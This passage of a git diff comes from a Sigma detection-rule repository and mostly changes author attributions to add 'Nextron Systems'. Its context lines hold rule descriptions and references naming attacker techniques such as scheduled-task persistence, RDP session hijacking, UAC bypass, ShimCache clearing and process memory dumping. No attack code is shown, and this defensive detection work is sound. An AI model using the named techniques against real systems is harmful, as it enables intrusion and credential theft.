 - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/03/05
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml b/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml
index f2a53981b..f37c18e95 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_rurat_exec_location.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects execution of Remote Utilities RAT (RURAT) from an unsual location (outisde of 'C:\Program Files')
 references:
 - https://redcanary.com/blog/misbehaving-rats/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/19
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml b/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml
index c0e05d16d..3e10b8fca 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml
@@ -2,7 +2,7 @@ title: Scheduled Task Creation
 id: 92626ddd-662c-49e3-ac59-f6535f12d189
 status: test
 description: Detects the creation of scheduled tasks in user session
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/01/16
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml
index 6ee19e819..d4f4c7e67 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
 references:
 - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/03/11
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml
index e04f307fb..ad1f11745 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml
@@ -8,7 +8,7 @@ description: |
 references:
 - Internal Research
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/28
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml
index b08e23407..29a3951fd 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete.yml
@@ -9,7 +9,7 @@ status: experimental
 description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
 references:
 - Internal Research
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/09
 tags:
 - attack.impact
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml
index 08df46a4e..4fe2263a1 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
 references:
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/09
 tags:
 - attack.impact
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml
index c998d6b3f..385d2a114 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml
@@ -5,7 +5,7 @@ description: Detects Schtask creations that point to a suspicious folder or an e
 references:
 - https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/
 - https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/21
 modified: 2022/09/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml
index 9157659e8..9c689f045 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects scheduled task creations that have suspicious action command and folder combinations
 references:
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/15
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml
index 83ad7615b..1a226b241 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious scheduled task creations from a parent stored in a temporary folder
 references:
 - https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/23
 modified: 2022/06/02
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml
index ecf0c3399..a62e6125a 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious scheduled task creations with commands that are uncommon
 references:
 - https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/23
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml
index 6674297d6..e745e7a68 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml
@@ -9,7 +9,7 @@ references:
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
 - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/09
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml
index 1049368d1..afc05bea8 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml
@@ -8,7 +8,7 @@ description: Detects scheduled task creations or modification to be run with hig
 references:
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change
 - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/31
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml b/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml
index df35d9cc5..2b22b0275 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)
 references:
 - https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/02/11
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml b/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml
index f5cbf324a..4bd0f950a 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a suspicious script executions in temporary folders or folders accessible by environment variables
 references:
 - https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/08
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml b/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml
index 5796b670b..5689bcaa9 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a suspicious script executions from temporary folder
 references:
 - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
-author: Florian Roth, Max Altgelt, Tim Shelton
+author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
 date: 2021/07/14
 modified: 2022/10/05
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml b/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml
index 3ea77b32e..21c9a0743 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml
@@ -8,7 +8,7 @@ description: Detects suspicious DACL modifications via the "Set-Service" cmdlet
 references:
 - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/
 - https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/18
 tags:
 - attack.persistence
diff --git a/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml b/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml
index e06bb4d1b..8601274f1 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a service binary running in a suspicious directory
 references:
 - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/03/09
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml b/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml
index e68a28a90..6d2a8dc58 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml
@@ -5,7 +5,7 @@ description: Detects service path modification via the "sc" binary to a suspicio
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
-author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)
+author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
 date: 2019/10/21
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml b/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml
index 7df638f02..f13c47cd1 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml
@@ -8,7 +8,7 @@ description: Detects the usage of one of the the commands to stop services such
 references:
 - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg
 - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/01
 modified: 2022/11/29
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml b/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml
index 538c99dea..58e169f56 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
 references:
 - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/14
 modified: 2022/12/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml b/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml
index 0023d42c1..69f930f7e 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
 references:
 - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/14
 modified: 2022/07/14
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml b/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml
index 0fdfa6e11..ecb2824ea 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml
@@ -9,7 +9,7 @@ references:
 - https://redcanary.com/blog/raspberry-robin/
 - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
 - https://github.com/SigmaHQ/sigma/issues/1009
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/01
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml b/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml
index 3e7652c2d..5976aefcb 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects actions that clear the local ShimCache and remove forensic evidence
 references:
 - https://medium.com/@blueteamops/shimcache-flush-89daff28d15e
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/02/01
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml b/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml
index 7ab1c7d94..d2dfe75fc 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious Splwow64.exe process without any command line parameters
 references:
 - https://twitter.com/sbousseaden/status/1429401053229891590?s=12
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/08/23
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_svchost.yml b/rules/windows/process_creation/proc_creation_win_susp_svchost.yml
index 7b3d03b93..f29b60edc 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_svchost.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_svchost.yml
@@ -2,7 +2,7 @@ title: Suspicious Svchost Process
 id: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d
 status: experimental
 description: Detects a suspicious svchost process start
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/08/15
 modified: 2022/06/28
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml b/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml
index 548d53c0f..8cc79ea75 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml
@@ -5,7 +5,7 @@ description: Detects suspicious sysprep process start with AppData folder as tar
 references:
 - https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets
 - https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/06/22
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml
index a73d5208c..2f91b2cf3 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml
@@ -5,7 +5,7 @@ description: Detects a suspicious process creation as SYSTEM user (suspicious pr
 references:
 - Internal Research
 - https://tools.thehacker.recipes/mimikatz/modules
-author: Florian Roth (rule), David ANDRE (additional keywords)
+author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
 date: 2021/12/20
 modified: 2023/01/19
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml
index 8739fcd18..9166033fe 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects shell32.dll executing a DLL in a suspicious directory
 references:
 - https://www.group-ib.com/resources/threat-research/red-curl-2.html
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/11/24
 modified: 2022/09/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml b/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml
index 3ac872847..3fbc8916a 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml
@@ -2,7 +2,7 @@ title: Taskmgr as LOCAL_SYSTEM
 id: 9fff585c-c33e-4a86-b3cd-39312079a65f
 status: experimental
 description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/03/18
 modified: 2022/05/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml b/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml
index afc123ceb..c87d37ee9 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml
@@ -2,7 +2,7 @@ title: Taskmgr as Parent
 id: 3d7679bd-0c00-440c-97b0-3f204273e6c7
 status: test
 description: Detects the creation of a process from Windows task manager
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/03/13
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml b/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml
index fa6eb47e3..142446702 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml
@@ -5,7 +5,7 @@ description: Detects a possible process memory dump that uses the white-listed C
 references:
 - https://twitter.com/_xpn_/status/1491557187168178176
 - https://www.youtube.com/watch?v=Ie831jF0bb0
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/10
 modified: 2022/05/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml b/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml
index 96e3eeef5..ab7e49900 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml
@@ -6,7 +6,7 @@ references:
 - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
 - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
 - https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/03/17
 modified: 2022/05/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml b/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml
index 72af5bec0..4dff44429 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml
@@ -5,7 +5,7 @@ description: Detects a suspicious RDP session redirect using tscon.exe
 references:
 - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
 - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/03/17
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml b/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml
index f8dc617fd..91dbe36f5 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml
@@ -6,7 +6,7 @@ references:
 - https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
 - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
 - https://github.com/netero1010/TrustedPath-UACBypass-BOF
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/08/27
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml
index 18301a4a1..1b32046a1 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a suspicious child process of userinit
 references:
 - https://twitter.com/SBousseaden/status/1139811587760562176
-author: Florian Roth (rule), Samir Bousseaden (idea)
+author: Florian Roth (Nextron Systems), Samir Bousseaden (idea)
 date: 2019/06/17
 modified: 2022/12/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml b/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml
index e7225b837..f9c0ee7ef 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious inline VBScript keywords as used by UNC2452
 references:
 - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/03/05
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml b/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml
index 8bc386ef5..a098d0454 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects commands that temporarily turn off Volume Snapshots
 references:
 - https://twitter.com/0gtweet/status/1354766164166115331
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/01/28
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml b/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml
index b6f0fdb9b..6346928bd 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
 references:
 - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/26
 logsource:
 category: process_creation
diff --git a/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml b/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml
index cbff1f31f..022b60575 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml
@@ -6,7 +6,7 @@ references:
 - https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html
 - https://www.echotrail.io/insights/search/wermgr.exe
 - https://github.com/binderlabs/DirCreate2System
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/10/14
 modified: 2022/12/04
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_whoami.yml b/rules/windows/process_creation/proc_creation_win_susp_whoami.yml
index 488f2efb4..309df4429 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_whoami.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_whoami.yml
@@ -5,7 +5,7 @@ description: Detects the execution of whoami, which is often used by attackers a
 references:
 - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/
 - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/08/13
 modified: 2022/05/13
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml b/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml
index c2c227cf9..413acb898 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml
@@ -6,7 +6,7 @@ references:
 - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/
 - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
 - https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/08/12
 modified: 2022/10/04
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml b/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml
index ee3718c3e..4d47ad868 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
 references:
 - https://twitter.com/blackarrowsec/status/1463805700602224645?s=12
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/11/29
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_win_server_undocumented_rce.yml b/rules/windows/process_creation/proc_creation_win_susp_win_server_undocumented_rce.yml
index 226abe7f8..936a5fe66 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_win_server_undocumented_rce.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_win_server_undocumented_rce.yml
@@ -5,7 +5,7 @@ description: Detects potential exploitation attempt of undocumented Windows Serv
 references:
 - https://twitter.com/YanZiShuang/status/1616777483646533632?s=20&t=TQT9tUuPbQJai4v6HtsOQw
